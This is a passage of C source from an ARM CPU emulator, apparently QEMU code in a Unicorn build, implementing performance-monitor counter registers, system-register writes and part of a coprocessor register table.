pmreg_access_selr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* ER: event counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 3)) != 0) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult pmreg_access_ccntr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* CR: cycle counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 2)) != 0 && isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } /* Returns true if the counter (pass 31 for PMCCNTR) should count events using * the current EL, security state, and register configuration. 
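 *
 * The result is the conjunction of three separate checks made below:
 * "enabled" (PMCR.E or MDCR_EL2.HPME, plus the counter's PMCNTEN bit),
 * "prohibited" (MDCR_EL2.HPMD / MDCR_EL3.SPME-style prohibitions), and
 * "filtered" (the P/U/NSK/NSU/NSH/M bits of PMEVTYPER/PMCCFILTR). For
 * example, a filter with U set but NSU clear stops the counter from
 * counting at Non-secure EL0.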
 */
static bool pmu_counter_enabled(CPUARMState *env, uint8_t counter)
{
    uint64_t filter;
    bool e, p, u, nsk, nsu, nsh, m;
    bool enabled, prohibited, filtered;
    bool secure = arm_is_secure(env);
    int el = arm_current_el(env);
    uint8_t hpmn = env->cp15.mdcr_el2 & MDCR_HPMN;

    if (!arm_feature(env, ARM_FEATURE_PMU)) {
        return false;
    }

    if (!arm_feature(env, ARM_FEATURE_EL2) ||
            (counter < hpmn || counter == 31)) {
        e = env->cp15.c9_pmcr & PMCRE;
    } else {
        e = env->cp15.mdcr_el2 & MDCR_HPME;
    }
    enabled = e && (env->cp15.c9_pmcnten & (1ULL << counter));

    if (!secure) {
        if (el == 2 && (counter < hpmn || counter == 31)) {
            prohibited = env->cp15.mdcr_el2 & MDCR_HPMD;
        } else {
            prohibited = false;
        }
    } else {
        prohibited = arm_feature(env, ARM_FEATURE_EL3) &&
            !(env->cp15.mdcr_el3 & MDCR_SPME);
    }

    if (prohibited && counter == 31) {
        prohibited = env->cp15.c9_pmcr & PMCRDP;
    }

    if (counter == 31) {
        filter = env->cp15.pmccfiltr_el0;
    } else {
        filter = env->cp15.c14_pmevtyper[counter];
    }

    p   = filter & PMXEVTYPER_P;
    u   = filter & PMXEVTYPER_U;
    nsk = arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_NSK);
    nsu = arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_NSU);
    nsh = arm_feature(env, ARM_FEATURE_EL2) && (filter & PMXEVTYPER_NSH);
    m   = arm_el_is_aa64(env, 1) &&
          arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_M);

    if (el == 0) {
        filtered = secure ? u : u != nsu;
    } else if (el == 1) {
        filtered = secure ? p : p != nsk;
    } else if (el == 2) {
        filtered = !nsh;
    } else { /* EL3 */
        filtered = m != p;
    }

    if (counter != 31) {
        /*
         * If not checking PMCCNTR, ensure the counter is setup to an event we
         * support
         */
        uint16_t event = filter & PMXEVTYPER_EVTCOUNT;
        if (!event_supported(event)) {
            return false;
        }
    }

    return enabled && !prohibited && !filtered;
}

/*
 * Ensure c15_ccnt is the guest-visible count so that operations such as
 * enabling/disabling the counter or filtering, modifying the count itself,
 * etc. can be done logically. This is essentially a no-op if the counter is
 * not enabled at the time of the call.
 */
static void pmccntr_op_start(CPUARMState *env)
{
    uint64_t cycles = cycles_get_count(env);

    if (pmu_counter_enabled(env, 31)) {
        uint64_t eff_cycles = cycles;
        if (env->cp15.c9_pmcr & PMCRD) {
            /* Increment once every 64 processor clock cycles */
            eff_cycles /= 64;
        }

        uint64_t new_pmccntr = eff_cycles - env->cp15.c15_ccnt_delta;

        uint64_t overflow_mask = env->cp15.c9_pmcr & PMCRLC ?
                                 1ull << 63 : 1ull << 31;
        if (env->cp15.c15_ccnt & ~new_pmccntr & overflow_mask) {
            env->cp15.c9_pmovsr |= (1 << 31);
        }

        env->cp15.c15_ccnt = new_pmccntr;
    }
    env->cp15.c15_ccnt_delta = cycles;
}

/*
 * If PMCCNTR is enabled, recalculate the delta between the clock and the
 * guest-visible count. A call to pmccntr_op_finish should follow every call to
 * pmccntr_op_start.
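 *
 * A small worked example of the delta scheme: if the guest writes 0 to
 * PMCCNTR while the underlying cycle source reads 1000, c15_ccnt_delta
 * ends up holding 1000; when the source later reads 1500, the next
 * pmccntr_op_start() recomputes the guest-visible count as
 * 1500 - 1000 = 500. Between the start/finish calls the state holds
 * real counts rather than deltas, so updates can be applied directly.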
*/ static void pmccntr_op_finish(CPUARMState *env) { #if 0 if (pmu_counter_enabled(env, 31)) { /* Calculate when the counter will next overflow */ uint64_t remaining_cycles = -env->cp15.c15_ccnt; if (!(env->cp15.c9_pmcr & PMCRLC)) { remaining_cycles = (uint32_t)remaining_cycles; } int64_t overflow_in = cycles_ns_per(remaining_cycles); if (overflow_in > 0) { int64_t overflow_at = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + overflow_in; ARMCPU *cpu = env_archcpu(env); timer_mod_anticipate_ns(cpu->pmu_timer, overflow_at); } uint64_t prev_cycles = env->cp15.c15_ccnt_delta; if (env->cp15.c9_pmcr & PMCRD) { /* Increment once every 64 processor clock cycles */ prev_cycles /= 64; } env->cp15.c15_ccnt_delta = prev_cycles - env->cp15.c15_ccnt; } #endif } static void pmevcntr_op_start(CPUARMState *env, uint8_t counter) { uint16_t event = env->cp15.c14_pmevtyper[counter] & PMXEVTYPER_EVTCOUNT; uint64_t count = 0; if (event_supported(event)) { uint16_t event_idx = supported_event_map[event]; count = pm_events[event_idx].get_count(env); } if (pmu_counter_enabled(env, counter)) { uint32_t new_pmevcntr = count - env->cp15.c14_pmevcntr_delta[counter]; if (env->cp15.c14_pmevcntr[counter] & ~new_pmevcntr & INT32_MIN) { env->cp15.c9_pmovsr |= (1ULL << counter); } env->cp15.c14_pmevcntr[counter] = new_pmevcntr; } env->cp15.c14_pmevcntr_delta[counter] = count; } static void pmevcntr_op_finish(CPUARMState *env, uint8_t counter) { #if 0 if (pmu_counter_enabled(env, counter)) { uint16_t event = env->cp15.c14_pmevtyper[counter] & PMXEVTYPER_EVTCOUNT; uint16_t event_idx = supported_event_map[event]; uint64_t delta = UINT32_MAX - (uint32_t)env->cp15.c14_pmevcntr[counter] + 1; int64_t overflow_in = pm_events[event_idx].ns_per_count(delta); if (overflow_in > 0) { int64_t overflow_at = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + overflow_in; ARMCPU *cpu = env_archcpu(env); timer_mod_anticipate_ns(cpu->pmu_timer, overflow_at); } env->cp15.c14_pmevcntr_delta[counter] -= env->cp15.c14_pmevcntr[counter]; } #endif } void pmu_op_start(CPUARMState *env) { unsigned int i; pmccntr_op_start(env); for (i = 0; i < pmu_num_counters(env); i++) { pmevcntr_op_start(env, i); } } void pmu_op_finish(CPUARMState *env) { unsigned int i; pmccntr_op_finish(env); for (i = 0; i < pmu_num_counters(env); i++) { pmevcntr_op_finish(env, i); } } void pmu_pre_el_change(ARMCPU *cpu, void *ignored) { pmu_op_start(&cpu->env); } void pmu_post_el_change(ARMCPU *cpu, void *ignored) { pmu_op_finish(&cpu->env); } void arm_pmu_timer_cb(void *opaque) { ARMCPU *cpu = opaque; /* * Update all the counter values based on the current underlying counts, * triggering interrupts to be raised, if necessary. pmu_op_finish() also * has the effect of setting the cpu->pmu_timer to the next earliest time a * counter may expire. 
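 *
 * Note that in this Unicorn build the timer re-arming halves of
 * pmccntr_op_finish() and pmevcntr_op_finish() above are compiled out
 * with "#if 0", so no overflow timer is actually scheduled here; the
 * start/finish pair still folds the current counts back into delta
 * form.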
*/ pmu_op_start(&cpu->env); pmu_op_finish(&cpu->env); } static void pmcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmu_op_start(env); if (value & PMCRC) { /* The counter has been reset */ env->cp15.c15_ccnt = 0; } if (value & PMCRP) { unsigned int i; for (i = 0; i < pmu_num_counters(env); i++) { env->cp15.c14_pmevcntr[i] = 0; } } env->cp15.c9_pmcr &= ~PMCR_WRITEABLE_MASK; env->cp15.c9_pmcr |= (value & PMCR_WRITEABLE_MASK); pmu_op_finish(env); } static void pmswinc_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { unsigned int i; for (i = 0; i < pmu_num_counters(env); i++) { /* Increment a counter's count iff: */ if ((value & (1ULL << i)) && /* counter's bit is set */ /* counter is enabled and not filtered */ pmu_counter_enabled(env, i) && /* counter is SW_INCR */ (env->cp15.c14_pmevtyper[i] & PMXEVTYPER_EVTCOUNT) == 0x0) { pmevcntr_op_start(env, i); /* * Detect if this write causes an overflow since we can't predict * PMSWINC overflows like we can for other events */ uint32_t new_pmswinc = env->cp15.c14_pmevcntr[i] + 1; if (env->cp15.c14_pmevcntr[i] & ~new_pmswinc & INT32_MIN) { env->cp15.c9_pmovsr |= (1ULL << i); } env->cp15.c14_pmevcntr[i] = new_pmswinc; pmevcntr_op_finish(env, i); } } } static uint64_t pmccntr_read(CPUARMState *env, const ARMCPRegInfo *ri) { uint64_t ret; pmccntr_op_start(env); ret = env->cp15.c15_ccnt; pmccntr_op_finish(env); return ret; } static void pmselr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* The value of PMSELR.SEL affects the behavior of PMXEVTYPER and * PMXEVCNTR. We allow [0..31] to be written to PMSELR here; in the * meanwhile, we check PMSELR.SEL when PMXEVTYPER and PMXEVCNTR are * accessed. */ env->cp15.c9_pmselr = value & 0x1f; } static void pmccntr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); env->cp15.c15_ccnt = value; pmccntr_op_finish(env); } static void pmccntr_write32(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint64_t cur_val = pmccntr_read(env, NULL); pmccntr_write(env, ri, deposit64(cur_val, 0, 32, value)); } static void pmccfiltr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); env->cp15.pmccfiltr_el0 = value & PMCCFILTR_EL0; pmccntr_op_finish(env); } static void pmccfiltr_write_a32(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); /* M is not accessible from AArch32 */ env->cp15.pmccfiltr_el0 = (env->cp15.pmccfiltr_el0 & PMCCFILTR_M) | (value & PMCCFILTR); pmccntr_op_finish(env); } static uint64_t pmccfiltr_read_a32(CPUARMState *env, const ARMCPRegInfo *ri) { /* M is not visible in AArch32 */ return env->cp15.pmccfiltr_el0 & PMCCFILTR; } static void pmcntenset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmcnten |= value; } static void pmcntenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmcnten &= ~value; } static void pmovsr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmovsr &= ~value; } static void pmovsset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmovsr |= value; } static void pmevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value, const uint8_t counter) { if (counter == 31) { pmccfiltr_write(env, ri, value); } else if (counter < pmu_num_counters(env)) { 
        pmevcntr_op_start(env, counter);

        /*
         * If this counter's event type is changing, store the current
         * underlying count for the new type in c14_pmevcntr_delta[counter] so
         * pmevcntr_op_finish has the correct baseline when it converts back to
         * a delta.
         */
        uint16_t old_event = env->cp15.c14_pmevtyper[counter] &
            PMXEVTYPER_EVTCOUNT;
        uint16_t new_event = value & PMXEVTYPER_EVTCOUNT;
        if (old_event != new_event) {
            uint64_t count = 0;
            if (event_supported(new_event)) {
                uint16_t event_idx = supported_event_map[new_event];
                count = pm_events[event_idx].get_count(env);
            }
            env->cp15.c14_pmevcntr_delta[counter] = count;
        }

        env->cp15.c14_pmevtyper[counter] = value & PMXEVTYPER_MASK;
        pmevcntr_op_finish(env, counter);
    }
    /* Attempts to access PMXEVTYPER are CONSTRAINED UNPREDICTABLE when
     * PMSELR value is equal to or greater than the number of implemented
     * counters, but not equal to 0x1f. We opt to behave as a RAZ/WI.
     */
}

static uint64_t pmevtyper_read(CPUARMState *env, const ARMCPRegInfo *ri,
                               const uint8_t counter)
{
    if (counter == 31) {
        return env->cp15.pmccfiltr_el0;
    } else if (counter < pmu_num_counters(env)) {
        return env->cp15.c14_pmevtyper[counter];
    } else {
        /*
         * We opt to behave as a RAZ/WI when attempts to access PMXEVTYPER
         * are CONSTRAINED UNPREDICTABLE. See comments in pmevtyper_write().
         */
        return 0;
    }
}

static void pmevtyper_writefn(CPUARMState *env, const ARMCPRegInfo *ri,
                              uint64_t value)
{
    uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7);

    pmevtyper_write(env, ri, value, counter);
}

static void pmevtyper_rawwrite(CPUARMState *env, const ARMCPRegInfo *ri,
                               uint64_t value)
{
    uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7);

    env->cp15.c14_pmevtyper[counter] = value;

    /*
     * pmevtyper_rawwrite is called between a pair of pmu_op_start and
     * pmu_op_finish calls when loading saved state for a migration. Because
     * we're potentially updating the type of event here, the value written to
     * c14_pmevcntr_delta by the preceding pmu_op_start call may be for a
     * different counter type. Therefore, we need to set this value to the
     * current count for the counter type we're writing so that pmu_op_finish
     * has the correct count for its calculation.
     */
    uint16_t event = value & PMXEVTYPER_EVTCOUNT;
    if (event_supported(event)) {
        uint16_t event_idx = supported_event_map[event];
        env->cp15.c14_pmevcntr_delta[counter] =
            pm_events[event_idx].get_count(env);
    }
}

static uint64_t pmevtyper_readfn(CPUARMState *env, const ARMCPRegInfo *ri)
{
    uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7);

    return pmevtyper_read(env, ri, counter);
}

static void pmxevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri,
                             uint64_t value)
{
    pmevtyper_write(env, ri, value, env->cp15.c9_pmselr & 31);
}

static uint64_t pmxevtyper_read(CPUARMState *env, const ARMCPRegInfo *ri)
{
    return pmevtyper_read(env, ri, env->cp15.c9_pmselr & 31);
}

static void pmevcntr_write(CPUARMState *env, const ARMCPRegInfo *ri,
                           uint64_t value, uint8_t counter)
{
    if (counter < pmu_num_counters(env)) {
        pmevcntr_op_start(env, counter);
        env->cp15.c14_pmevcntr[counter] = value;
        pmevcntr_op_finish(env, counter);
    }
    /*
     * We opt to behave as a RAZ/WI when attempts to access PM[X]EVCNTR
     * are CONSTRAINED UNPREDICTABLE.
*/ } static uint64_t pmevcntr_read(CPUARMState *env, const ARMCPRegInfo *ri, uint8_t counter) { if (counter < pmu_num_counters(env)) { uint64_t ret; pmevcntr_op_start(env, counter); ret = env->cp15.c14_pmevcntr[counter]; pmevcntr_op_finish(env, counter); return ret; } else { /* We opt to behave as a RAZ/WI when attempts to access PM[X]EVCNTR * are CONSTRAINED UNPREDICTABLE. */ return 0; } } static void pmevcntr_writefn(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); pmevcntr_write(env, ri, value, counter); } static uint64_t pmevcntr_readfn(CPUARMState *env, const ARMCPRegInfo *ri) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); return pmevcntr_read(env, ri, counter); } static void pmevcntr_rawwrite(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); assert(counter < pmu_num_counters(env)); env->cp15.c14_pmevcntr[counter] = value; pmevcntr_write(env, ri, value, counter); } static uint64_t pmevcntr_rawread(CPUARMState *env, const ARMCPRegInfo *ri) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); assert(counter < pmu_num_counters(env)); return env->cp15.c14_pmevcntr[counter]; } static void pmxevcntr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmevcntr_write(env, ri, value, env->cp15.c9_pmselr & 31); } static uint64_t pmxevcntr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return pmevcntr_read(env, ri, env->cp15.c9_pmselr & 31); } static void pmuserenr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { if (arm_feature(env, ARM_FEATURE_V8)) { env->cp15.c9_pmuserenr = value & 0xf; } else { env->cp15.c9_pmuserenr = value & 1; } } static void pmintenset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* We have no event counters so only the C bit can be changed */ value &= pmu_counter_mask(env); env->cp15.c9_pminten |= value; } static void pmintenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pminten &= ~value; } static void vbar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Note that even though the AArch64 view of this register has bits * [10:0] all RES0 we can only mask the bottom 5, to comply with the * architectural requirements for bits which are RES0 only in some * contexts. (ARMv8 would permit us to do no masking at all, but ARMv7 * requires the bottom five bits to be RAZ/WI because they're UNK/SBZP.) */ raw_write(env, ri, value & ~0x1FULL); } static void scr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Begin with base v8.0 state. */ uint32_t valid_mask = 0x3fff; ARMCPU *cpu = env_archcpu(env); if (arm_el_is_aa64(env, 3)) { value |= SCR_FW | SCR_AW; /* these two bits are RES1. */ valid_mask &= ~SCR_NET; } else { valid_mask &= ~(SCR_RW | SCR_ST); } if (!arm_feature(env, ARM_FEATURE_EL2)) { valid_mask &= ~SCR_HCE; /* On ARMv7, SMD (or SCD as it is called in v7) is only * supported if EL2 exists. The bit is UNK/SBZP when * EL2 is unavailable. In QEMU ARMv7, we force it to always zero * when EL2 is unavailable. * On ARMv8, this bit is always available. */ if (arm_feature(env, ARM_FEATURE_V7) && !arm_feature(env, ARM_FEATURE_V8)) { valid_mask &= ~SCR_SMD; } } if (cpu_isar_feature(aa64_lor, cpu)) { valid_mask |= SCR_TLOR; } if (cpu_isar_feature(aa64_pauth, cpu)) { valid_mask |= SCR_API | SCR_APK; } /* Clear all-context RES0 bits. 
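 * For example, with the base v8.0 valid_mask of 0x3fff, a write on a
 * CPU without EL2 has SCR_HCE stripped by the masking above, so the
 * guest reads HCE back as zero; likewise bits above bit 13 survive
 * only if a feature test (LOR, PAuth) explicitly added them.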
*/ value &= valid_mask; raw_write(env, ri, value); } static CPAccessResult access_aa64_tid2(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID2)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static uint64_t ccsidr_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); /* Acquire the CSSELR index from the bank corresponding to the CCSIDR * bank */ uint32_t index = A32_BANKED_REG_GET(env, csselr, ri->secure & ARM_CP_SECSTATE_S); return cpu->ccsidr[index]; } static void csselr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { raw_write(env, ri, value & 0xf); } static uint64_t isr_read(CPUARMState *env, const ARMCPRegInfo *ri) { CPUState *cs = env_cpu(env); uint64_t hcr_el2 = arm_hcr_el2_eff(env); uint64_t ret = 0; bool allow_virt = (arm_current_el(env) == 1 && (!arm_is_secure_below_el3(env) || (env->cp15.scr_el3 & SCR_EEL2))); if (allow_virt && (hcr_el2 & HCR_IMO)) { if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { ret |= CPSR_I; } } else { if (cs->interrupt_request & CPU_INTERRUPT_HARD) { ret |= CPSR_I; } } if (allow_virt && (hcr_el2 & HCR_FMO)) { if (cs->interrupt_request & CPU_INTERRUPT_VFIQ) { ret |= CPSR_F; } } else { if (cs->interrupt_request & CPU_INTERRUPT_FIQ) { ret |= CPSR_F; } } /* External aborts are not possible in QEMU so A bit is always clear */ return ret; } static CPAccessResult access_aa64_tid1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID1)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static CPAccessResult access_aa32_tid1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { return access_aa64_tid1(env, ri, isread); } return CP_ACCESS_OK; } static const ARMCPRegInfo v7_cp_reginfo[] = { /* the old v6 WFI, UNPREDICTABLE in v7 but we choose to NOP */ { .name = "NOP", .cp = 15, .crn = 7, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_NOP }, /* Performance monitors are implementation defined in v7, * but with an ARM recommended set of registers, which we * follow. * * Performance registers fall into three categories: * (a) always UNDEF in PL0, RW in PL1 (PMINTENSET, PMINTENCLR) * (b) RO in PL0 (ie UNDEF on write), RW in PL1 (PMUSERENR) * (c) UNDEF in PL0 if PMUSERENR.EN==0, otherwise accessible (all others) * For the cases controlled by PMUSERENR we must set .access to PL0_RW * or PL0_RO as appropriate and then check PMUSERENR in the helper fn. 
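 *
 * Most of these registers also exist in both a 32-bit (.cp = 15) and a
 * 64-bit (_EL0/_EL1, ARM_CP_STATE_AA64) view backed by the same state
 * field; one view of each pair is marked ARM_CP_ALIAS so the shared
 * value is only reset and migrated once.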
*/ { .name = "PMCNTENSET", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcnten), .writefn = pmcntenset_write, .accessfn = pmreg_access, .raw_writefn = raw_write }, { .name = "PMCNTENSET_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 1, .access = PL0_RW, .accessfn = pmreg_access, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcnten), .resetvalue = 0, .writefn = pmcntenset_write, .raw_writefn = raw_write }, { .name = "PMCNTENCLR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcnten), .accessfn = pmreg_access, .writefn = pmcntenclr_write, .type = ARM_CP_ALIAS }, { .name = "PMCNTENCLR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 2, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcnten), .writefn = pmcntenclr_write }, { .name = "PMOVSR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 3, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmovsr), .accessfn = pmreg_access, .writefn = pmovsr_write, .raw_writefn = raw_write }, { .name = "PMOVSCLR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsr_write, .raw_writefn = raw_write }, { .name = "PMSWINC", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 4, .access = PL0_W, .accessfn = pmreg_access_swinc, .type = ARM_CP_NO_RAW | ARM_CP_IO, .writefn = pmswinc_write }, { .name = "PMSWINC_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 4, .access = PL0_W, .accessfn = pmreg_access_swinc, .type = ARM_CP_NO_RAW | ARM_CP_IO, .writefn = pmswinc_write }, { .name = "PMSELR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 5, .access = PL0_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmselr), .accessfn = pmreg_access_selr, .writefn = pmselr_write, .raw_writefn = raw_write}, { .name = "PMSELR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 5, .access = PL0_RW, .accessfn = pmreg_access_selr, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmselr), .writefn = pmselr_write, .raw_writefn = raw_write, }, { .name = "PMCCNTR", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 0, .access = PL0_RW, .resetvalue = 0, .type = ARM_CP_ALIAS | ARM_CP_IO, .readfn = pmccntr_read, .writefn = pmccntr_write32, .accessfn = pmreg_access_ccntr }, { .name = "PMCCNTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 0, .access = PL0_RW, .accessfn = pmreg_access_ccntr, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c15_ccnt), .readfn = pmccntr_read, .writefn = pmccntr_write, .raw_readfn = raw_read, .raw_writefn = raw_write, }, { .name = "PMCCFILTR", .cp = 15, .opc1 = 0, .crn = 14, .crm = 15, .opc2 = 7, .writefn = pmccfiltr_write_a32, .readfn = pmccfiltr_read_a32, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .resetvalue = 0, }, { .name = "PMCCFILTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 15, .opc2 = 7, .writefn = pmccfiltr_write, .raw_writefn = raw_write, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .fieldoffset = 
offsetof(CPUARMState, cp15.pmccfiltr_el0), .resetvalue = 0, }, { .name = "PMXEVTYPER", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access, .writefn = pmxevtyper_write, .readfn = pmxevtyper_read }, { .name = "PMXEVTYPER_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access, .writefn = pmxevtyper_write, .readfn = pmxevtyper_read }, { .name = "PMXEVCNTR", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access_xevcntr, .writefn = pmxevcntr_write, .readfn = pmxevcntr_read }, { .name = "PMXEVCNTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access_xevcntr, .writefn = pmxevcntr_write, .readfn = pmxevcntr_read }, { .name = "PMUSERENR", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 0, .access = PL0_R | PL1_RW, .accessfn = access_tpm, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmuserenr), .resetvalue = 0, .writefn = pmuserenr_write, .raw_writefn = raw_write }, { .name = "PMUSERENR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 14, .opc2 = 0, .access = PL0_R | PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmuserenr), .resetvalue = 0, .writefn = pmuserenr_write, .raw_writefn = raw_write }, { .name = "PMINTENSET", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pminten), .resetvalue = 0, .writefn = pmintenset_write, .raw_writefn = raw_write }, { .name = "PMINTENSET_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 1, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenset_write, .raw_writefn = raw_write, .resetvalue = 0x0 }, { .name = "PMINTENCLR", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenclr_write, }, { .name = "PMINTENCLR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 2, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenclr_write }, { .name = "CCSIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = 0, .access = PL1_R, .accessfn = access_aa64_tid2, .readfn = ccsidr_read, .type = ARM_CP_NO_RAW }, { .name = "CSSELR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_aa64_tid2, .writefn = csselr_write, .resetvalue = 0, .bank_fieldoffsets = { 